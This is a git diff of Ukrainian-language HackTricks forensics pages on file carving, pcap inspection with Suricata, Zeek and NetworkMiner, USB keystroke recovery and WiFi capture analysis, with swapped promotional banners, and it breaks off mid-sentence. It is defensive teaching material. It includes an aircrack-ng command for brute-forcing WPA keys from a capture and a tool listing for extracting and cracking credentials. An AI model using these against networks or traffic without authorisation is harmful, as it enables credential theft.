-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Інструменти для відновлення даних ## Autopsy -Найпоширеніший інструмент, який використовується в судовій експертизі для вилучення файлів з образів - [**Autopsy**](https://www.autopsy.com/download/). Завантажте його, встановіть та дайте йому обробити файл для пошуку "прихованих" файлів. Зверніть увагу, що Autopsy призначений для підтримки образів дисків та інших видів образів, але не простих файлів. +Найпоширеніший інструмент, який використовується в судовому розшуку для вилучення файлів з образів - це [**Autopsy**](https://www.autopsy.com/download/). Завантажте його, встановіть та використовуйте для пошуку "прихованих" файлів у файлі. Зверніть увагу, що Autopsy призначений для роботи з образами дисків та іншого роду образами, а не просто файлами. ## Binwalk @@ -40,7 +41,7 @@ foremost -v -i file.img -o output ``` ## **Scalpel** -**Scalpel** - ще один інструмент, який можна використовувати для пошуку та вилучення **файлів, вбудованих у файл**. У цьому випадку вам потрібно розкоментувати з конфігураційного файлу \(_/etc/scalpel/scalpel.conf_\) типи файлів, які ви хочете видобути. +**Scalpel** - це ще один інструмент, який можна використовувати для пошуку та вилучення **файлів, вбудованих у файл**. У цьому випадку вам потрібно розкоментувати типи файлів, які ви хочете видобути з конфігураційного файлу \(_/etc/scalpel/scalpel.conf_\). ```bash sudo apt-get install scalpel scalpel file.img -o output @@ -53,7 +54,7 @@ scalpel file.img -o output ```text bulk_extractor memory.img -o out_folder ``` -Пройдіть через **всю інформацію**, яку зібрав інструмент \(паролі?\), **проаналізуйте** **пакети** \(читайте [**аналіз Pcaps**](../pcap-inspection/)\), шукайте **дивні домени** \(домени, пов'язані з **шкідливим ПЗ** або **несправжніми**\). +Пройдіть через **всю інформацію**, яку зібрав інструмент \(паролі?\), **проаналізуйте** **пакети** \(читайте [**аналіз Pcaps**](../pcap-inspection/)\), шукайте **дивні домени** \(домени, пов'язані з **шкідливим ПЗ** або **несущісніми**\). ## PhotoRec @@ -63,31 +64,32 @@ bulk_extractor memory.img -o out_folder ![](../../../.gitbook/assets/image%20%28524%29.png) -# Конкретні інструменти для витягування даних +# Конкретні інструменти для відновлення даних ## FindAES -Шукає ключі AES, шукаючи їх розклади ключів. Здатний знаходити ключі на 128, 192 та 256 біт, такі, як ті, що використовуються TrueCrypt та BitLocker. +Шукає ключі AES, шукаючи їх розклади ключів. Здатний знаходити ключі 128, 192 та 256 біт, такі, як ті, що використовуються TrueCrypt та BitLocker. Завантажте [тут](https://sourceforge.net/projects/findaes/). -# Додаткові інструменти +# Допоміжні інструменти Ви можете використовувати [**viu** ](https://github.com/atanunq/viu), щоб переглядати зображення з терміналу. Ви можете використовувати інструмент командного рядка linux **pdftotext**, щоб перетворити pdf у текст і прочитати його. +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану в HackTricks** або **завантажити HackTricks у PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index a686742bf..fffd9898c 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,27 +1,28 @@ # Інспекція Pcap +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/) є найбільш важливою подією з кібербезпеки в **Іспанії** і однією з найважливіших в **Європі**. З місією просування технічних знань, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій дисципліні. +[**RootedCON**](https://www.rootedcon.com/) є найбільш важливою подією з кібербезпеки в **Іспанії** та однією з найважливіших в **Європі**. З місією просування технічних знань, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій галузі. {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -Про **PCAP** проти **PCAPNG**: існує дві версії формату файлу PCAP; **PCAPNG є новішою і не підтримується всіма інструментами**. Можливо, вам доведеться конвертувати файл з PCAPNG в PCAP за допомогою Wireshark або іншого сумісного інструмента, щоб працювати з ним в інших інструментах. +Про **PCAP** проти **PCAPNG**: існують дві версії формату файлу PCAP; **PCAPNG є новішою і не підтримується всіма інструментами**. Можливо, вам доведеться конвертувати файл з PCAPNG в PCAP за допомогою Wireshark або іншого сумісного інструмента, щоб працювати з ним у деяких інших інструментах. {% endhint %} ## Онлайн інструменти для pcap @@ -48,7 +49,7 @@ ### Фреймворк Xplico -[**Xplico** ](https://github.com/xplico/xplico)_(тільки для linux)_ може **аналізувати** pcap і витягувати з нього інформацію. Наприклад, з файлу pcap Xplico витягує кожен електронний лист (протоколи POP, IMAP та SMTP), всі вміст HTTP, кожний дзвінок VoIP (SIP), FTP, TFTP та інше. +[**Xplico** ](https://github.com/xplico/xplico)_(тільки для Linux)_ може **аналізувати** pcap та витягувати з нього інформацію. Наприклад, з файлу pcap Xplico витягує кожен електронний лист (протоколи POP, IMAP та SMTP), всі вміст HTTP, кожний дзвінок VoIP (SIP), FTP, TFTP та інше. **Встановлення** ```bash @@ -68,8 +69,8 @@ sudo apt-get install xplico ### NetworkMiner -Подібно до Xplico, це інструмент для **аналізу та вилучення об'єктів з pcap**. Є безкоштовна версія, яку можна **завантажити** [**тут**](https://www.netresec.com/?page=NetworkMiner). Працює з **Windows**.\ -Цей інструмент також корисний для отримання **іншої інформації, проаналізованої** з пакетів, щоб знати, що відбувалося **швидше**. +Подібно до Xplico, це інструмент для **аналізу та вилучення об'єктів з pcap**. Є безкоштовне видання, яке можна **завантажити** [**тут**](https://www.netresec.com/?page=NetworkMiner). Працює з **Windows**.\ +Цей інструмент також корисний для отримання **іншої інформації, проаналізованої** з пакетів, щоб знати, що відбувалося **швидшим** способом. ### NetWitness Investigator @@ -79,7 +80,7 @@ sudo apt-get install xplico ### [BruteShark](https://github.com/odedshimon/BruteShark) * Вилучення та кодування імен користувачів та паролів (HTTP, FTP, Telnet, IMAP, SMTP...) -* Вилучення хешів аутентифікації та їх розшифрування за допомогою Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +* Вилучення хешів аутентифікації та їх розкриття за допомогою Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) * Побудова візуальної діаграми мережі (Мережеві вузли та користувачі) * Вилучення запитів DNS * Відновлення всіх TCP та UDP сесій @@ -109,7 +110,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
-[**RootedCON**](https://www.rootedcon.com/) є найбільш важливою подією з кібербезпеки в **Іспанії** та однією з найважливіших в **Європі**. З метою просування технічних знань, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у кожній дисципліні. +[**RootedCON**](https://www.rootedcon.com/) - найбільш важлива подія з кібербезпеки в **Іспанії** та одна з найважливіших в **Європі**. З метою просування технічних знань, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій галузі. {% embed url="https://www.rootedcon.com/" %} @@ -124,7 +125,7 @@ apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` -**Перевірте pcap** +**Перевірка pcap** ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` @@ -150,7 +151,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log > [Zeek](https://docs.zeek.org/en/master/about.html) - це пасивний, відкритий аналізатор мережевого трафіку з відкритим вихідним кодом. Багато операторів використовують Zeek як монітор мережевої безпеки (NSM), щоб підтримувати розслідування підозрілої або зловмисної діяльності. Zeek також підтримує широкий спектр завдань аналізу трафіку поза областю безпеки, включаючи вимірювання продуктивності та усунення неполадок. -Фактично, журнали, створені за допомогою `zeek`, не є **pcaps**. Тому вам потрібно використовувати **інші інструменти** для аналізу журналів, де є **інформація** про pcaps. +Фактично, журнали, створені `zeek`, не є **pcaps**. Тому вам потрібно використовувати **інші інструменти** для аналізу журналів, де є **інформація** про pcaps. ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) @@ -235,20 +236,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) - найбільш важлива подія з кібербезпеки в **Іспанії** і одна з найважливіших в **Європі**. З **місією просування технічних знань**, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій галузі. +[**RootedCON**](https://www.rootedcon.com/) - найбільш важлива подія з кібербезпеки в **Іспанії** та одна з найважливіших в **Європі**. З **місією просування технічних знань** цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій галузі. {% embed url="https://www.rootedcon.com/" %} +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 026317290..881e93a1d 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи телеграм**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Якщо у вас є pcap-файл USB-підключення з багатьма перериваннями, ймовірно, це підключення USB-клавіатури. +Якщо у вас є файл pcap USB-підключення з великою кількістю переривань, ймовірно, це підключення USB-клавіатури. Фільтр Wireshark, подібний до цього, може бути корисним: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` @@ -26,16 +27,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи телеграм**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 84cbdc6e3..3bb45038e 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Якщо у вас є файл pcap, що містить комунікацію через USB клавіатури, подібну до наступної: +Якщо у вас є файл pcap, що містить комунікацію через USB клавіатури, подібно до наступного: ![](<../../../.gitbook/assets/image (613).png>) -Ви можете використати інструмент [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser), щоб отримати текст, який був написаний у цій комунікації: +Ви можете використати інструмент [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser), щоб отримати вміст комунікації. ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` -Ви можете знайти більше інформації та знайти деякі скрипти щодо аналізу цього за посиланнями: +Ви можете дізнатися більше і знайти деякі скрипти щодо аналізу цього за посиланнями: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.**
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 3d5487989..fcfe8f398 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.**
+{% endhint %} # Перевірка BSSIDs @@ -23,28 +24,26 @@ ## Brute Force -Один з стовпців на екрані показує, чи **була знайдена будь-яка аутентифікація всередині pcap**. Якщо це так, ви можете спробувати використати Brute force за допомогою `aircrack-ng`: +Один із стовпчиків на цьому екрані показує, чи **була знайдена будь-яка аутентифікація всередині pcap**. Якщо це так, ви можете спробувати використати Brute force за допомогою `aircrack-ng`: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` -Наприклад, він витягне пароль WPA, що захищає PSK (попередньо встановлений ключ), який буде потрібно розшифрувати трафік пізніше. - # Дані в маяках / Бічний канал -Якщо ви підозрюєте, що **дані витікають всередині маяків мережі Wifi**, ви можете перевірити маяки мережі, використовуючи фільтр, подібний до наступного: `wlan містить <ІМЯмережі>`, або `wlan.ssid == "ІМЯмережі"` шукати підозрілі рядки всередині відфільтрованих пакетів. +Якщо ви підозрюєте, що **дані витікають в маяках мережі Wifi**, ви можете перевірити маяки мережі, використовуючи фільтр, подібний наступному: `wlan contains <ІМЯМЕРЕЖІ>`, або `wlan.ssid == "ІМЯМЕРЕЖІ"`, шукаючи підозрілі рядки відфільтрованих пакетів. -# Знайдіть невідомі MAC-адреси в мережі Wifi +# Знаходження невідомих MAC-адрес в мережі Wifi -Наступне посилання буде корисним для пошуку **машин, що відправляють дані всередині мережі Wifi**: +Наступне посилання буде корисним для пошуку **машин, які надсилають дані в мережі Wifi**: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` Якщо ви вже знаєте **MAC-адреси, ви можете видалити їх з виводу**, додавши перевірки, подібні до цієї: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Після виявлення **невідомих MAC-адрес, що спілкуються всередині мережі**, ви можете використовувати **фільтри**, подібні до наступного: `wlan.addr== && (ftp || http || ssh || telnet)` для фільтрації його трафіку. Зверніть 